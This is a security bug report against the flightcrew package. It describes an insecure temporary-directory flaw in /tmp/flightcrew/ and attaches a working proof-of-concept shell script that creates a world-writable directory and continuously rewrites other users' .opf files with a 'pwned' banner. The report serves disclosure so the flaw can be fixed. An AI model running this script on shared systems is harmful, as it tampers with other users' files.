Package: flightcrew
Version: 0.7.2+dfsg-8
Tags: security
flightcrew creates temporary files in /tmp/flightcrew/, even when this
directory belongs to another user. Malicious user could exploit this to tamper
with other users' temporary files; probably also to overwrite arbitrary files
via symlink attack.
I've attached proof-of-concept exploit. When it is running, all users will be
getting spurious validation errors:
$ whoami
jwilk
$ ls -ld /tmp/flightcrew/
drwxrwxrwx+ 3 mallory mallory 60 May 6 22:58 /tmp/flightcrew/
$ flightcrew-cli EpubValidates_Valid.epub
EpubValidates_Valid.epub/OEBPS/content.opf(2): error 1105: The <package> element's
"version" attribute value needs to be "2.0", but is "
_______
< pwned >
-------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
".
--
Jakub Wilk
#!/bin/sh
set -e -u
mkdir -m 777 /tmp/flightcrew
cd /tmp/flightcrew
setfacl -d -m "u:$USER:rwx" .
msg='
_______
< pwned >
-------
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
'
msg=$(printf '%s' "$msg" | sed -e 's/\\/\\\\/g' -e 's/</\\\</g' -e
's/$/\\\ /' | tr -d '\n')
while true
do
find . -type f -name '*.opf' -exec sed -i -r -e '/<[?]/b' -e
"s@version=(\"[^\"]+\"|'[^']+')@version=\"$msg\"@" {} + || true
done
